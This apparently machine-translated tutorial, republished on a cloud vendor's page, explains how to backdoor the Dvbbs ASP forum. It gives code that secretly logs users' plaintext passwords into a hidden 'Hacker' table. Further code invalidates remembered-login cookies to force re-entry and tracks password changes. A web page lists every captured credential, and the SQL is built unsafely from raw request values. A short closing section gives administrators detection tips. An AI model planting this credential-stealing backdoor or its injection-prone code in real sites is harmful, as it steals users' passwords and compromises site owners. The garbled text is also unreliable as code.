Add a password sniffer (Dvbbs) _ Vulnerability study for the Dynamic web forum

Source: Internet
Author: User
Tags md5 md5 encryption
Dynamic Network Pioneer Forum, with its powerful comprehensive function, plus it provides free to individual users, in the network many forums, unique. Many people make it the best choice for their forum. However, the new version of the forum, the user password using irreversible MD5 encryption, even the administrator, can not query the personal user's password. The database can only query the results of encryption.

First describe it has to login process, the user input account number, call the MD5 function, enter the password encryption, and then compare stored in the database data and password encryption results are the same. If the log is the same, the login is successful and the personal information is saved in the cookie.
Now we have to do it ourselves, to add a record password for the forum function.

View the source file of the file Login.asp it logged into the system. The validation process is a direct call to the Chklogin () function. Follow the Chklogin () function, you can see the previous sentence is to check whether the user is full input, and then is:
PASSWORD=MD5 (CHECKSTR (Request ("password")))
That's it. The MD5 encryption function is invoked to encrypt the password submitted by the user. To record unencrypted code, we need to add our own code to the front of this sentence. Do not rush to write code, because we want to store the password in the database, so first in the database if our own table.
Open the database file for the network, because we just need to save two items in this table: username and password, so open "CREATE table using designer", the field name is entered User,pass, the data type is text. Then save the table, named Hacker.

Below we can use SQL commands in the ASP program to add the username and password to the table we just created. Let's just add the following two sentences to the above code:
' First query the database to see if the user's password has been logged to avoid repeated additions
Set Rs=conn.execute ("Select User from Hacker where user=" &request ("username") & "")
If rs.eof and Rs.bof then
' If not, insert the username and password into the table we just created
Sql= "INSERT INTO hacker (User,pass) VALUES (" &request ("username") & "," &request ("password") & ")"
Conn.execute (SQL)
Rs.close
Else
End If
Through the above code, each time the user login, the username and password will be automatically added to the table we created hacker.
However, the dynamic Network forum also has a function, that is, you can use cookies to save login information one day, one months, or a year, so that you do not have to enter the account every visit, of course, we do not want to let this part of the user's password omitted, so we have to find ways to So he had to log in through our revised files.
Dynamic Network forum for the cookie check code is saved in the \inc\const.asp file, we open to view its source files.
Membername=checkstr (Request.Cookies ("Aspsky") ("username"))
Memberclass=checkstr (Request.Cookies ("Aspsky") ("UserClass"))
Memberword=checkstr (Request.Cookies ("Aspsky") ("password"))
[$NBSP] [$NBSP] [$NBSP] [$NBSP] These three sentences are used to check the information stored in the user's cookie, we just change any one variable, we can make its landing invalid. I added the following sentence code after the second sentence:
' Check if the user's account has been logged, if not, modify its password variable for user name
Set Rs=conn.execute ("Select User from Hacker where user=" &membername& ")
If rs.eof and Rs.bof then
Memberword=checkstr (Request.Cookies ("Aspsky") ("username"))
Rs.close
Else
' If it has been recorded, the cookie verifies that everything is OK, so that the user will not be suspected of being completely invalidated by the cookie.
Memberword=checkstr (Request.Cookies ("Aspsky") ("password"))
End If
Record the user account code we basically finished, as soon as the user landed, his account will be directly into our database. But we also missed a point, that is, if the user changes the password, our record of the password is expired, our record program is unable to determine whether the password has been modified. So we're going to continue to revamp our code-changing program modifypsw.asp
RS ("UserPassword") =password
RS ("quesion") =quesion
RS ("answer") =answer
Rs. Update
The code above is the code that updates the password. We analyze: Only users can change the password after landing, since the landing, our database must record his password, so no matter what his password changed to, we only need to update our database on the line, so in the above four lines of code, add the following two sentences:
[$NBSP] [$nbsp] ' Note, here we do not use variable password, because it is the result of MD5 encryption
sql = "Update hacker set pass=" &request ("PSW") & "where user=" &membername& ""
Conn.execute (SQL)
Finally, we can not open the database every time to query the user's password, so we also have to write an ASP program, used to query the user's password through the Web interface.
The following is my own ASP code, borrowed the dynamic Network forum used to fuzzy query a function. You can search for the user name directly to get the account number or show all the recorded accounts.

<!--#include file= "conn.asp"-->
<!--#include file= "inc/const.asp"-->
<%
' The function of the dynamic net used for fuzzy query translate ()
Public function translate (SOURCESTR,FIELDSTR)
[$NBSP] [$nbsp]dim SourceList
[$NBSP] [$nbsp]dim ResultStr
[$NBSP] [$nbsp]dim I,j
[$NBSP] [$nbsp]if InStr (Sourcestr, "") >0 Then
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]dim Isoperator
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator = True
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]sourcelist=split (SOURCESTR)
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP]--------------------------------------------------------
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]rem Response.Write "num:" & CStr (UBound (sourceList)) & "<br>"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]for i = 0 To UBound (sourceList)
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]rem Response.Write I
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Select Case UCase (sourceList (i))
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Case "and", "&", "and", "and"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr & "and"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator = True
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Case "or", "|", "or"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr & "or"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator = True
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Case ' not ', '! ', ' non ', '! ","! "
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr & "not"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator = True
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Case "(", "(", ") ("
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr & "("
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator = True
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Case ")", ")", "") "
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr &] "
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator = True
[$NBSP] [$NBSP] [$NBSP] [$NBSP] Case Else
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]if sourceList (i) <> "" Then
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]if not Isoperator then Resultstr=resultstr & "and"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]if inStr (sourceList (i), "%") > 0 Then
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr& "" &fieldStr& "Like" & Replace (SourceList (i), "", "") & ""
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]else
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]resultstr=resultstr& "" &fieldStr& "like%" & Replace (SourceList (i), "" "," ") &"% "
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]end if
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]isoperator=false
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] End If
[$NBSP] [$NBSP] [$NBSP] [$NBSP] End Select
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]rem Response.Write resultstr+ "<br>"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]next
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]translate=resultstr
[$NBSP] [$nbsp]else single condition
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]if inStr (sourcestr, "%") > 0 Then
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]translate= "" & Fieldstr & "like" & Replace (Sourcestr, "", "") & ""
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]else
[$NBSP] [$NBSP] [$NBSP] [$nbsp]translate= "" & fieldstr & "Like%" & Replace (Sourcestr, "", "") & "%"
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] End If
[$NBSP] [$nbsp]end if
End Function
%>
<%

' Check if a fuzzy query is used, and if so, query the database
If Request.Form ("id") <> "then
Dim key
Key = Request.Form ("id")
Set Rs=conn.execute ("Select User,pass from Hacker where (" & Translate (Key, "user") & ")"
' Check if all accounts are queried, and if so, all records are queried
else if request.querystring ("id") <> "all" then
Else
Set Rs=conn.execute ("SELECT * FROM Hacker")
End If
End If

%>

<div align= "center" >
[$NBSP] [$nbsp]<p><strong> Query Password </strong></p>
[$NBSP] [$nbsp]<form name= "Form1" method= "Post" action= "" >
[$NBSP] [$NBSP] [$NBSP] [$nbsp] User name:
[$NBSP] [$NBSP] [$NBSP] [$nbsp]<input name= "id" type= "text" size= ">"
[$NBSP] [$NBSP] [$NBSP] [$NBSP]
[$NBSP] [$NBSP] [$NBSP] [$nbsp]<input type= "Submit" name= "submit" value= "Search" >
[$NBSP] [$nbsp]</form>
[$NBSP] [$nbsp]<p><a href= "Test.asp?id=all" > Show All </a></p>
[$NBSP] [$nbsp]<table width= "border=" 1 "cellspacing=" 0 "cellpadding=" 0 ">
<%
' Check whether the account is queried, if not displayed please select the Query method, otherwise display the result
If Request.QueryString ("id") <> "" or Request.Form ("id") <> "" Then%><tr>
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]<td width= "><div" align= "center" > Username </div></td>
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]<td width= "><div" align= "center" > Password </div></td>
[$NBSP] [$NBSP] [$NBSP] [$nbsp]</tr>
<% Do while (not rs.eof)%><tr>
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]<td><% =rs ("user")%></td>
[$NBSP] [$NBSP] [$NBSP] [$NBSP] [$NBSP] [$nbsp]<td><% =rs ("Pass")%></td>
[$NBSP] [$NBSP] [$NBSP] [$nbsp]</tr>
[$NBSP] [$nbsp]<% Rs. MoveNext
[$NBSP] [$NBSP] Loop
[$NBSP] [$NBSP] Rs.close
[$NBSP] [$nbsp]else
[$NBSP] [$nbsp]response.write ("<tr><td><center> select query mode </center></td></tr>")
[$NBSP] [$nbsp]end if
[$NBSP] [$NBSP]%>
[$NBSP] [$nbsp]</table>
</div>
[$NBSP] [$NBSP] [$NBSP] [$NBSP]

Some other thoughts:
If the server is hacked, we must also prevent the forum is modified to become someone else to get the password tool, so we have to consider the hacker's common means.
First is the database, we need to check whether the database is complete at any time, and to achieve timely seniority. Now popular on the network to change the database suffix name to ASP, the database to add a table can not be deleted, it is effective to prevent the database by others to download. In other words, the hacker is likely to change his own database file suffix name to ASP, thus hiding in a large number of files. and generally no experience of the administrator is difficult to find, so to regularly check the entire site's files, if no reason to come out of ASP files, very likely is only behind the Black Hand.
Hackers can not only put their own ASP files, smart Hackers will also hide their own ASP files in the existing ASP files. Using the browser, you can transfer querystring variables to ASP files, if you set a conditional statement in asp: if Query.string ("variable") = "" Then ... This simple method can be said to be impossible. The general administrator because of the convenience of the database, is rarely considered to check whether the file on the server has been modified. So it is very necessary to check whether the file is modified regularly.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.